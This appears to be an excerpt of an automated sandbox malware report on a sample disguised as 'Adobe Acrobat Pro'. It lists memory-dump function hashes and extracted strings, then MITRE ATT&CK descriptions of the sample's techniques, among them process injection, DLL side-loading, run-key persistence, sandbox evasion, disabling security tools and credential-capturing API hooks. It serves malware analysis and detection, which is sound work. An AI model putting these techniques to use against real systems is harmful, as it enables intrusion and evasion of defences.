Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8b35c8b8c4f6972812cc0718913fe71456378471f7bd949de4e0500c9c5920
Instruction ID: 9d7d0b991cd71c5abb317cbc5b4116aa467c70721e30d1c410ba18524ad8dfee
Opcode Fuzzy Hash: bd8b35c8b8c4f6972812cc0718913fe71456378471f7bd949de4e0500c9c5920
Instruction Fuzzy Hash: 172125345087519BCB09DF79C8904EBBBE2EBC6320F24DB2EA5E5872D4CA355502DB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3967CA Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c2cd4d6d4089978509583c8918ed281fe4714116904ef5a8df487f962986942
Instruction ID: d5d81ebc00123c524c1bd89c25c89c8b343a7f7ef9cb5692246c22859bf14f63
Opcode Fuzzy Hash: 0c2cd4d6d4089978509583c8918ed281fe4714116904ef5a8df487f962986942
Instruction Fuzzy Hash: 862157322183228FD718DF3CE4809DAB3E1EBC2324F688B3DD465C65D5E676911AC604

Uniqueness

Uniqueness Score: -1.00%

Function 1CF1D9E3 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CF1D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CF1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cf1d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1493aa5ee7843d6e0d5c415661a3fa81a652e6a18a11a24420533c97aaca3f8b
Instruction ID: d471302f3b4ea338c3ac70440667e7a05812e54a1cebf56d3a62d155c8cdd031
Opcode Fuzzy Hash: 1493aa5ee7843d6e0d5c415661a3fa81a652e6a18a11a24420533c97aaca3f8b
Instruction Fuzzy Hash: FA3157355096828FC329EF38C491897B7F1FFC63107518A6CC1A28B6E9E7356829CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1B39C2EB Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d2650e14cf02a88223b8e26ece7960224cd5adf35838534515be0dd062c196
Instruction ID: 0ca239621c62f88beaa85fbd12ea69c0bc6a0f44960f6286d73973bde2fdcc5e
Opcode Fuzzy Hash: 88d2650e14cf02a88223b8e26ece7960224cd5adf35838534515be0dd062c196
Instruction Fuzzy Hash: 56216B3A5097524BA319EB2DD8404FAB3E3FFD4310B55CA7F81A6872A8DB74151BCB40

Uniqueness

Uniqueness Score: -1.00%

Function 1B3BF1DE Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080cf98737161d6745c07ab6cd468f01f6664a39681992ebc65515eeabf94093
Instruction ID: 60f21dce8ca7e04f5f89580ae9978b394783b701862ed8c92ace966457eecea5
Opcode Fuzzy Hash: 080cf98737161d6745c07ab6cd468f01f6664a39681992ebc65515eeabf94093
Instruction Fuzzy Hash: B93137719087168AD708EF68E44059AB3A1FFD6320F208B7DE1AAC75D9E7386602CB44

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B45B9 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e38e79e7ded2a84705236dab628dcf1ffc587fa6ed0a24f2800cd286a58e6165
Instruction ID: 0425b96e084994974ab965bbc1fc1660faa7be65b9f95681893901f7ddfd150e
Opcode Fuzzy Hash: e38e79e7ded2a84705236dab628dcf1ffc587fa6ed0a24f2800cd286a58e6165
Instruction Fuzzy Hash: 3C314531108B554BC308EF68E4414AAB7A1EBC9314FA1CB3D889ACB1E5D7799526CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AA1C9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8da792428489ef38f488faf676b7628e15cf311534ff9665043ecde1907dada
Instruction ID: 55c2c2af660a5d8a8a4167f1136a0ad05e3202d068fcf6e7442f8e2bde5fb283
Opcode Fuzzy Hash: d8da792428489ef38f488faf676b7628e15cf311534ff9665043ecde1907dada
Instruction Fuzzy Hash: A3212C771186874FEB08DE78E9A00DA77D2FBC5334BB48B2ED545C76E0E72554058604

Uniqueness

Uniqueness Score: -1.00%

Function 1CC9B949 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b9dc5cb67c2c0d72a17caeb131a87ce0ef0712429374a1b1c095876148fca5
Instruction ID: 53bc84a7c6415b439a78073be5b11a40d54550a5dc4e88bfc32090c28810166b
Opcode Fuzzy Hash: 09b9dc5cb67c2c0d72a17caeb131a87ce0ef0712429374a1b1c095876148fca5
Instruction Fuzzy Hash: A921463520C7024BD318DF78E0944EFF3E29FCA305FA599AED0978798AD625406EDB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A4E37 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deb791065cc45acee93647ea957fd13bb256e939c8c9d0806f84c532492db1bb
Instruction ID: dcf1f38251fcd1ec64dd64d56a19f243044da6a35a630abf48a859745ca4137f
Opcode Fuzzy Hash: deb791065cc45acee93647ea957fd13bb256e939c8c9d0806f84c532492db1bb
Instruction Fuzzy Hash: 352122365145018BD709DB78C4944EA73A2EFC5235F90971D90A64B6E4C729A90EDB05

Uniqueness

Uniqueness Score: -1.00%

Function 1CA554D7 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ef75e7b3b7795215ff0f629273af9f52b19bcef4c4b73ce19338891cc10e4f0
Instruction ID: c4171da9c48facd50c152e57556d7982c758bb34d60330775b8a2c3fbdab8f51
Opcode Fuzzy Hash: 8ef75e7b3b7795215ff0f629273af9f52b19bcef4c4b73ce19338891cc10e4f0
Instruction Fuzzy Hash: 61117B515619410BDB0AC031CC846E32393EBC73A1B41C73DE49A8B4CECBAE911BD49E

Uniqueness

Uniqueness Score: -1.00%

Function 1CA5295B Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b6246c9dea51682d328a1281b9ba59d6bb89f1b02163f7bd55a90485a3b63eb
Instruction ID: 267963d45cbefa3fb2ba462ba9572e8489460d182911e3ec81f0b72fd51c6ed1
Opcode Fuzzy Hash: 7b6246c9dea51682d328a1281b9ba59d6bb89f1b02163f7bd55a90485a3b63eb
Instruction Fuzzy Hash: 8C214939221A078BD304EB3CD8D16F673D2EB86324B915A7D9106C71C4DB39690EC748

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A1D51 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e4db656270e7b3a5190e6be0f06df0f1845279c860fbdcfdbe39ea73da86895
Instruction ID: 55dee292d0cc6253af464755ad2cf63de1c3f095026b38e8b838d2e4ef1f0d7c
Opcode Fuzzy Hash: 3e4db656270e7b3a5190e6be0f06df0f1845279c860fbdcfdbe39ea73da86895
Instruction Fuzzy Hash: BC2148350147028FD399DF38E4904E6B7E2EFD9358B509A6E8085C7AD8EB35A00ECB45

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C312A Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6fffd0188929e82d73650ab100e0cbc12702ee89cd90bede6657e23e2558524
Instruction ID: f1bcb2896eaa3d73b8f27320ab1ad44240f43deb4ce80afa8093e7d461494311
Opcode Fuzzy Hash: c6fffd0188929e82d73650ab100e0cbc12702ee89cd90bede6657e23e2558524
Instruction Fuzzy Hash: 6921AD7260861B8FD714CA64E8A14EA33F3EBC5320B78C67FC012CB2D5E23991568B50

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AA568 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a71522f629d22038c57c0807600a9b038c8a37fd4d37686f281900dec1aea1c6
Instruction ID: 180ffd09ee81aaecff62a69d257da583602029a8d8f4947711ec4f994f2bce32
Opcode Fuzzy Hash: a71522f629d22038c57c0807600a9b038c8a37fd4d37686f281900dec1aea1c6
Instruction Fuzzy Hash: 59219E3850860A4FD315FF1CC8918EF73A2EFC5320F95871DD4568B2E4EB61F4258A41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A4428 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca50adf5bb896912efa2872eca0a77c5e4346fe7dfdab9f22b9d23090aa9796
Instruction ID: 1f10cd4b7ae3ac04c37e20d19a6672cac09ef1674376739a6622a0383a371fdc
Opcode Fuzzy Hash: fca50adf5bb896912efa2872eca0a77c5e4346fe7dfdab9f22b9d23090aa9796
Instruction Fuzzy Hash: E921363511CB078BD31CEF69E8982B6B3D5FBC9310FA09A3E806BCA5C5DB21551ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB2A4E Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f80f951625865c5000f0faa48bf392820e751fa4e42767a8d52f95cc7513eea
Instruction ID: 44f335edde7b7a9e97ccc78ca6da1acffb868eff32c790ee64348ccde0b97598
Opcode Fuzzy Hash: 0f80f951625865c5000f0faa48bf392820e751fa4e42767a8d52f95cc7513eea
Instruction Fuzzy Hash: 4B11AB2A250D1B078B15DA3ADC624FB73D6DBD0321798E33944A3870E8F938601AD690

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AA69B Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20088efb00bd8a26253af47e6cc92bf696826fadc7b0fe816910f62096625fb9
Instruction ID: 0ce903c766c4b35890e4d22d6da33c8fbf38a012238709f49ca24b3159d40651
Opcode Fuzzy Hash: 20088efb00bd8a26253af47e6cc92bf696826fadc7b0fe816910f62096625fb9
Instruction Fuzzy Hash: DC11D02A1146534BE709EA2AD8E41FB77D3DBC5316318D2BDC1978B7C5E52180478A80

Uniqueness

Uniqueness Score: -1.00%

Function 1CA58D21 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 275fc687544dfa09c3ddc339adc10d929c4564b082dfce7b0f9327b32ef35ab9
Instruction ID: aa716c422519024061ccca93f1eef6f7dc8cb5d3d127f1335b48f201dad429d8
Opcode Fuzzy Hash: 275fc687544dfa09c3ddc339adc10d929c4564b082dfce7b0f9327b32ef35ab9
Instruction Fuzzy Hash: 34113436614A220BD709AA799C910E73793ABCA2623D8D77CC122C76D8E778614A8284

Uniqueness

Uniqueness Score: -1.00%

Function 1CC01AE9 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ee6450e43d3e7bd18c45381e7f625570e1b75463b2ca4c28217b58ac950377
Instruction ID: 13ae2d7d0f5d73a11e11a4bb88b7aab4fbf5563a1f847f8eff5a7a1413a5ca54
Opcode Fuzzy Hash: 41ee6450e43d3e7bd18c45381e7f625570e1b75463b2ca4c28217b58ac950377
Instruction Fuzzy Hash: 7921D3342086118BC71DDF39C4914BEB7E1EF85310F628A2D98E6872D4CF3465449B86

Uniqueness

Uniqueness Score: -1.00%

Function 1B396632 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e3bf79c75205de88e725953724dd66d75f3317789318d36c78209309866f9e8
Instruction ID: b356207a055f49aa95e0fd47429400948d03dfa2282638ee8d296fe5cb2a87e3
Opcode Fuzzy Hash: 8e3bf79c75205de88e725953724dd66d75f3317789318d36c78209309866f9e8
Instruction Fuzzy Hash: A811273A704A018FCB0DEE34E0260BE73E2AB9A300751853ED19BC75D1EB71D122DB45

Uniqueness

Uniqueness Score: -1.00%

Function 1CEE116D Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8efa32790e6457fc6831ea1e4ee850437a1aaa045001756961c7775faf939189
Instruction ID: e560885cf593139301dcbd6bf3ac3b9ca34280a96e75f548bc0521052b6df616
Opcode Fuzzy Hash: 8efa32790e6457fc6831ea1e4ee850437a1aaa045001756961c7775faf939189
Instruction Fuzzy Hash: A81106791046068BD718DF2DD4645DB73E2FBC5320B24C63CC5998B1D8E7B4584ACF86

Uniqueness

Uniqueness Score: -1.00%

Function 1CA56333 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CA4B000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CA4B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ca4b000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81842c61af8e328dc5d0a4a9522e33461c6af42fb126a40ea41adfa62bd1eab3
Instruction ID: 9d8fc0b9bb0c6c2fcedecfbc563b32a4e7da41a0bf29e8b4dd2d20d735068b0b
Opcode Fuzzy Hash: 81842c61af8e328dc5d0a4a9522e33461c6af42fb126a40ea41adfa62bd1eab3
Instruction Fuzzy Hash: D301457A7105430BE309DE3DC8952FA6343A7C4360B51C378828BCBAC4EA78D41F8758

Uniqueness

Uniqueness Score: -1.00%

Function 1A76097E Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001A73D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1A73D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1a73d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5a37053edc01d2c135c57f38bf9e6ab926d9182be7989363bd61e4a54fe3ed
Instruction ID: c0a7d8f10e2b60fc09b66391a6d558a6bca42b28486b11859ab5e1357f7fecd2
Opcode Fuzzy Hash: 4c5a37053edc01d2c135c57f38bf9e6ab926d9182be7989363bd61e4a54fe3ed
Instruction Fuzzy Hash: 02D05E75928B158AD6049BB0940092BB771ABC4720F54CA2CE2C8130C0C2340419A353

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C94DE Relevance: 6.3, Strings: 5, Instructions: 52
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#$<X, xrefs: 1B3C9510
+>', xrefs: 1B3C956D
F, xrefs: 1B3C953E
', xrefs: 1B3C9597
s, xrefs: 1B3C9536

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: #$<X$'$+>'$F$s
API String ID: 0-4052180066
Opcode ID: 1e13719c87151a9cd9c3061c386671cab499e29e4f38257298922ac7c56db789
Instruction ID: 662a10200acd8099c287e1d80c6b1a339f0360a5f70a6fb6c1d3b2626b89e791
Opcode Fuzzy Hash: 1e13719c87151a9cd9c3061c386671cab499e29e4f38257298922ac7c56db789
Instruction Fuzzy Hash: 65213A396083418BD305DF69A6401ABB7D6FBC5310F20D67ED98AD3A84D774680ACF5A

Uniqueness

Uniqueness Score: -1.00%

Function 1D01AA6A Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

m, xrefs: 1D01AB3C
3,*., xrefs: 1D01AAC5
2, xrefs: 1D01AB7F
A, xrefs: 1D01AB10

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D019000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D019000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d019000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 2$3,*.$A$m
API String ID: 0-401308226
Opcode ID: 5c8153d3ffd8fcee3ebdd0ef916233d3578dc7cb44f697428ad0da99b2109b91
Instruction ID: f57c90f708e0d07012b3bfc7be98818b36f0fbdf95bede73d3068602d8f532c9
Opcode Fuzzy Hash: 5c8153d3ffd8fcee3ebdd0ef916233d3578dc7cb44f697428ad0da99b2109b91
Instruction Fuzzy Hash: FF311E3591C6538BD31DDF18E890AAAB3E4FBC2315F74497DC49683096EB212416CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 1CC96265 Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

M, xrefs: 1CC9635B
d, xrefs: 1CC962E6
W, xrefs: 1CC962F8
!, xrefs: 1CC962C1

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !$M$W$d
API String ID: 0-896299573
Opcode ID: e0843a44afdb0f75ba44a939bf29356e1c22e6701f232fd33383c1710c3bbba1
Instruction ID: 8f5026c324fc0eb25dd044ce271171a15e4f30dec92015f9502475c381fbbd22
Opcode Fuzzy Hash: e0843a44afdb0f75ba44a939bf29356e1c22e6701f232fd33383c1710c3bbba1
Instruction Fuzzy Hash: 743156356087419FD709DB38C8549ABB7D1FFD6324F58CA6CC1DA8B284DB789802DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AE1A1 Relevance: 5.1, Strings: 4, Instructions: 63COMMON

Download Yara Rule

Strings

M, xrefs: 1B3AE1F1
p, xrefs: 1B3AE24E
j, xrefs: 1B3AE258
m, xrefs: 1B3AE1A1

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: M$j$m$p
API String ID: 0-968692619
Opcode ID: c6c05883b72b39820d5adc7712ec4f010f2e238d38da896ef497fddf418e2929
Instruction ID: 02fb3af4735251463f4d8170bbd043c2e72e159eebb3a4842ab899c414af5e2b
Opcode Fuzzy Hash: c6c05883b72b39820d5adc7712ec4f010f2e238d38da896ef497fddf418e2929
Instruction Fuzzy Hash: D721F03910C306AED70CEF68E8514BE73E1FF88761F20852EE885872A0FB758446C709

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
